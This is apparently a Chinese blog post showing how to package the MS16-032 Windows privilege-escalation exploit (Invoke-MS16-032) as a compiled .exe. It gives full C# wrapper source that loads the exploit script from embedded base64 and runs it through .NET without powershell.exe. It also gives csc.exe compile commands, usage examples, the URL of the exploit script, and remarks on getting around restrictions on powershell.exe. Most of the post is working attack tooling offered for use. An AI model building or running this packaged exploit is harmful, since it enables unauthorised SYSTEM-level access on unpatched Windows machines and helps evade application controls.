授人以鱼不如授人以渔

之前的 MS16-032 是个 PowerShell 脚本,怎么改成 exe 呢?很简单:用 .NET 把脚本包一层,稍作修改后编译即可。已经改好的代码在这里:

戳我

gist貌似被墙了,我在这里也贴一下:

/*
Author: Evilcg, Twitter: @Evilcg
Step One:
PS C:\> [psobject].Assembly.Location
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
Step Two:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:MS16_032.exe MS16_032.cs
*/

// On Windows 10 the reference assembly may be here: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35
using System;
using System.IO;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Text;
using System.Threading.Tasks;
using System.Management.Automation;
using System.Management.Automation.Host;
using System.Management.Automation.Runspaces;

namespace ConsoleApplication1
{
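  class Program
  {
    // Target executable and its optional command line, as parsed from argv.
    static string _application;
    static string _commandline;

    /// <summary>
    /// Entry point: MS16_032.exe &lt;application&gt; [&lt;commandline&gt;].
    /// Hands the arguments to the embedded Invoke-MS16-032 script.
    /// </summary>
    /// <param name="args">argv without the program name.</param>
    /// <returns>0 after the script has been invoked, 1 on a usage error.</returns>
    static int Main(string[] args)
    {
      // Exactly one or two arguments are accepted; anything else is a usage error.
      // (The original silently returned 0 for three or more arguments.)
      if (args.Length == 0 || args.Length > 2)
      {
        System.Console.WriteLine("Usage: MS16_032.exe calc.exe OR MS16_032.exe cmd.exe \"/c calc.exe\"");
        return 1;
      }

      _application = args[0];
      // An empty command line tells the executor to omit -Commandline entirely.
      _commandline = args.Length == 2 ? args[1] : "";

      PowerShellExecutor executor = new PowerShellExecutor();
      executor.ExecuteSynchronously(_application, _commandline);
      return 0;
    }
  }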

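  class PowerShellExecutor
  {
    // Invoke-MS16-032.ps1 embedded as base64 and decoded as UTF-8 when the class loads.
    // Base64 is packaging, not protection: anyone holding the binary can recover the script.
    // The encoded bytes must therefore be UTF-8 (not UTF-16) or the decode yields garbage.
    public static string PSInvoke_MS16_032 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@"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"));

    /// <summary>
    /// Defines Invoke-MS16-032 in a fresh runspace and calls it synchronously,
    /// without going through powershell.exe.
    /// </summary>
    /// <param name="aplication">Executable to launch; passed as -Application.</param>
    /// <param name="commandline">Arguments for it; passed as -Commandline, omitted when empty.</param>
    public void ExecuteSynchronously(string aplication, string commandline)
    {
      InitialSessionState iss = InitialSessionState.CreateDefault();

      // Runspace and PowerShell are IDisposable; `using` releases them even when Invoke()
      // throws (the original only reached rs.Close() on the success path).
      using (Runspace rs = RunspaceFactory.CreateRunspace(iss))
      using (PowerShell ps = PowerShell.Create())
      {
        rs.Open();
        ps.Runspace = rs;

        // Statement 1: run the script so the Invoke-MS16-032 function exists in the runspace.
        ps.AddScript(PSInvoke_MS16_032);
        ps.AddStatement();

        // Statement 2: call the function. Arguments go through AddParameter instead of being
        // spliced into script text, so a path with spaces or quotes (or anything PowerShell
        // would otherwise parse, e.g. $(...) or ;) arrives as a literal value. The original
        // built the line by concatenation and left -Application unquoted when no command line
        // was given, which broke on paths containing spaces.
        ps.AddCommand("Invoke-MS16-032").AddParameter("Application", aplication);
        if (commandline != "")
        {
          ps.AddParameter("Commandline", commandline);
        }
        ps.AddCommand("Out-Default");

        // Echo what is about to run, as the original did.
        string shown = "Invoke-MS16-032 -Application \"" + aplication + "\"";
        if (commandline != "")
        {
          shown += " -Commandline \"" + commandline + "\"";
        }
        Console.WriteLine(shown);

        ps.Invoke();

        // Invoke() does not throw for non-terminating errors; surface them so a failed
        // attempt is not mistaken for success just because the process exited with 0.
        foreach (ErrorRecord err in ps.Streams.Error)
        {
          Console.Error.WriteLine("[!] " + err.ToString());
        }
      }
    }
  }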
}

base64 的内容是 https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 全文的 base64 编码(你也可以换成自己的 PowerShell 脚本;注意代码是按 UTF-8 解码的,所以编码前的脚本必须保存为 UTF-8 而不是 UTF-16,否则解出来是乱码)。base64 只是方便嵌入,没有任何保护作用,拿到 exe 的人可以直接还原出脚本。由于我改的这个版本带参数,所以简单写了上面的 C# 代码,通过 .NET 来执行 PowerShell。

编译需要引用 System.Management.Automation.dll,具体步骤在 cs 文件的注释里已经写了,请自行编译。我只在本机测试过,其他系统版本没有测试,测试 Demo 如下:

http://static.wooyun.org/upload/image/201606/2016063013052815262.gif

通过 .NET 来执行 PowerShell,并不需要 powershell.exe。不过 System.Management.Automation.dll 仍然会被加载进本进程,脚本也照样在 PowerShell 引擎里执行,所以针对该 DLL 加载或脚本块日志的监控(如果目标开启了)仍可能记录到这次执行——这只是绕过了对 powershell.exe 本身的限制,不是免检测。详情可以看一下 p0wnedShell 或者 http://zone.wooyun.org/content/26831

.net 2.0下编译的版本在这里
